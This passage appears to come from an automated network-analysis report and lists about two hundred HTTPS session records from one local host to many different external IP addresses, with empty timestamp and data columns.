                                                        17640192.168.2.145203212.102.30.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17641192.168.2.1453904139.233.26.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17642192.168.2.1456402201.99.31.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17643192.168.2.1454292158.110.133.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17644192.168.2.145398666.18.132.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17645192.168.2.1460254191.41.215.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17646192.168.2.1454580184.139.42.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17647192.168.2.1436566140.148.49.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17648192.168.2.146085085.78.74.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17649192.168.2.1435562186.12.238.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17650192.168.2.145663871.148.180.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17651192.168.2.1459678222.49.92.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17652192.168.2.1455132165.236.142.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17653192.168.2.1449496122.112.43.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17654192.168.2.143567048.184.106.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17655192.168.2.145210645.166.248.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17656192.168.2.1441980187.52.4.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17657192.168.2.1451276117.94.114.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17658192.168.2.144117879.93.45.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17659192.168.2.1449966223.135.6.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17660192.168.2.1447574217.105.255.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17661192.168.2.145206439.176.44.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17662192.168.2.1456490136.18.65.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17663192.168.2.1444492153.67.179.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17664192.168.2.146010636.155.195.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17665192.168.2.144666024.222.96.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17666192.168.2.1457286115.104.123.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17667192.168.2.143535662.197.9.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17668192.168.2.1436634133.217.45.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17669192.168.2.143346013.252.2.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17670192.168.2.146022463.231.117.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17671192.168.2.1449124168.185.114.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17672192.168.2.143646671.202.9.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17673192.168.2.144438077.173.190.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17674192.168.2.1435378200.51.177.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17675192.168.2.1457980156.5.35.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17676192.168.2.144136094.164.89.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17677192.168.2.1435366197.107.101.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17678192.168.2.1449848207.224.233.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17679192.168.2.1442866195.27.62.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17680192.168.2.1439344155.189.29.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17681192.168.2.1458136164.66.216.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17682192.168.2.144003467.36.213.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17683192.168.2.1435148163.216.94.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17684192.168.2.1451118198.131.50.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17685192.168.2.1449906173.234.250.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17686192.168.2.1460280140.168.38.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17687192.168.2.1460242172.6.115.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17688192.168.2.145827420.89.73.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17689192.168.2.1452806143.248.161.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17690192.168.2.1440370219.225.187.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17691192.168.2.1437458181.222.160.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17692192.168.2.145252668.176.87.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17693192.168.2.1451690183.12.166.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17694192.168.2.1457802165.109.186.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17695192.168.2.1440574183.5.107.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17696192.168.2.1440850144.171.115.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17697192.168.2.144459280.126.121.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17698192.168.2.1456580136.118.17.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17699192.168.2.1437124110.184.169.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17700192.168.2.1456432161.206.10.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17701192.168.2.1444856154.96.125.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17702192.168.2.143342827.170.223.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17703192.168.2.1433040126.15.73.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17704192.168.2.143853819.100.15.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17705192.168.2.1434552197.150.106.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17706192.168.2.1447628109.31.53.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17707192.168.2.1448444139.187.239.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17708192.168.2.1457762120.77.0.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17709192.168.2.144817092.224.16.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17710192.168.2.1443208121.199.68.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17711192.168.2.1451380113.184.8.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17712192.168.2.144488014.131.234.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17713192.168.2.143415448.110.39.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17714192.168.2.1437742138.212.140.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17715192.168.2.144162873.22.23.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17716192.168.2.145957446.31.101.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17717192.168.2.145388091.87.61.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17718192.168.2.1456420129.25.211.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17719192.168.2.1459624105.1.135.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17720192.168.2.1440518141.160.185.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17721192.168.2.1437646217.251.21.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17722192.168.2.1437338116.21.128.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17723192.168.2.1449860204.207.252.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17724192.168.2.1459472187.45.212.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17725192.168.2.143702884.59.253.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17726192.168.2.144066068.6.60.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17727192.168.2.1435212201.112.47.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17728192.168.2.1441380159.233.234.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17729192.168.2.143741863.67.160.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17730192.168.2.1437012176.153.142.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17731192.168.2.1447088117.213.97.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17732192.168.2.1457382105.225.83.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17733192.168.2.1438250152.107.174.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17734192.168.2.1454806181.9.187.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17735192.168.2.1450392130.81.102.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17736192.168.2.144285497.19.90.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17737192.168.2.1447442216.13.247.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17738192.168.2.1435590220.27.176.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17739192.168.2.1439522142.173.47.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17740192.168.2.14398729.217.71.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17741192.168.2.1458446197.234.66.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17742192.168.2.143802423.10.150.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17743192.168.2.14422325.29.202.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17744192.168.2.1452318203.226.149.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17745192.168.2.144995092.233.206.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17746192.168.2.1460202152.23.200.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17747192.168.2.1457356124.128.130.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17748192.168.2.144643282.63.131.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17749192.168.2.1434724100.197.43.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17750192.168.2.143405260.135.115.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17751192.168.2.143436439.67.189.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17752192.168.2.145516637.111.153.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17753192.168.2.145378275.53.173.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17754192.168.2.145691644.21.151.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17755192.168.2.1456108161.201.42.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17756192.168.2.1444600220.88.221.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17757192.168.2.143795239.196.242.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17758192.168.2.144508079.154.18.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17759192.168.2.144018624.12.213.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17760192.168.2.1435632223.168.149.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17761192.168.2.145215239.234.10.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17762192.168.2.1458986211.35.163.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17763192.168.2.1433450106.215.30.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17764192.168.2.1455644132.236.244.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17765192.168.2.1444952197.220.49.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17766192.168.2.146038666.36.124.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17767192.168.2.1446028153.239.112.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17768192.168.2.1433778128.138.92.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17769192.168.2.14376505.217.202.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17770192.168.2.144654270.175.227.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17771192.168.2.1454008123.155.51.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17772192.168.2.144992049.229.23.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17773192.168.2.1445782182.132.130.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17774192.168.2.1434770131.42.45.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17775192.168.2.1450566171.192.240.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17776192.168.2.1445220151.133.151.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17777192.168.2.1454182143.120.58.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17778192.168.2.1439730165.78.5.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17779192.168.2.1441026148.154.164.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17780192.168.2.1435130193.233.161.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17781192.168.2.1436766184.173.168.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17782192.168.2.144021083.137.165.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17783192.168.2.1460218160.168.74.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17784192.168.2.1445918202.252.88.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17785192.168.2.1453608164.38.80.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17786192.168.2.1457500111.104.32.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17787192.168.2.1437870149.232.218.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17788192.168.2.1446366192.111.224.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17789192.168.2.1438086118.23.75.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17790192.168.2.14440185.116.50.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17791192.168.2.1433098200.219.149.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17792192.168.2.1450410130.155.237.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17793192.168.2.145927899.196.228.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17794192.168.2.1456828116.122.96.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17795192.168.2.145689479.103.96.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17796192.168.2.144421012.97.180.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17797192.168.2.1437386126.253.179.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17798192.168.2.1433398211.170.85.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17799192.168.2.1449128209.94.60.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17800192.168.2.1452128105.90.82.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17801192.168.2.145328495.53.177.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17802192.168.2.1443748143.207.131.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17803192.168.2.1440244205.254.247.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17804192.168.2.1435032179.156.179.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17805192.168.2.145135032.150.166.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17806192.168.2.1456862184.41.42.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17807192.168.2.14592641.189.250.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17808192.168.2.14530081.206.148.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17809192.168.2.144733876.48.49.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17810192.168.2.1447422108.151.159.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17811192.168.2.144858081.73.214.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17812192.168.2.1442126135.82.132.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17813192.168.2.1436862187.225.79.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17814192.168.2.145370631.213.145.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17815192.168.2.1451420200.204.98.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17816192.168.2.1441724119.210.125.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17817192.168.2.1439484132.187.9.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17818192.168.2.144393283.82.158.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17819192.168.2.145698678.124.71.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17820192.168.2.143366275.182.30.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17821192.168.2.145038220.187.61.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17822192.168.2.1455290213.87.245.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17823192.168.2.143353479.109.150.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17824192.168.2.144411296.156.203.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17825192.168.2.1435562141.162.10.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17826192.168.2.1452344200.136.150.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17827192.168.2.144191648.237.182.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17828192.168.2.1454720108.217.198.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17829192.168.2.1443646149.8.195.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17830192.168.2.1435460151.149.211.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17831192.168.2.1447374143.80.193.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17832192.168.2.1447960105.120.152.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17833192.168.2.143515690.164.77.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17834192.168.2.1457478208.131.236.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17835192.168.2.1449986102.141.101.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17836192.168.2.1441570216.155.67.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17837192.168.2.1449142183.191.171.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17838192.168.2.143308249.35.69.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17839192.168.2.145757678.77.75.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17840192.168.2.1455956184.147.253.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17841192.168.2.1440358122.200.193.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17842192.168.2.145100827.187.80.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17843192.168.2.145626270.146.146.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17844192.168.2.144530413.164.244.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17845192.168.2.1455742190.137.9.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17846192.168.2.144942498.33.79.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17847192.168.2.145795219.224.242.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17848192.168.2.1441944115.26.137.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17849192.168.2.145585845.152.197.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17850192.168.2.145402835.82.76.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17851192.168.2.1444986208.19.86.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17852192.168.2.1444106198.153.195.141443
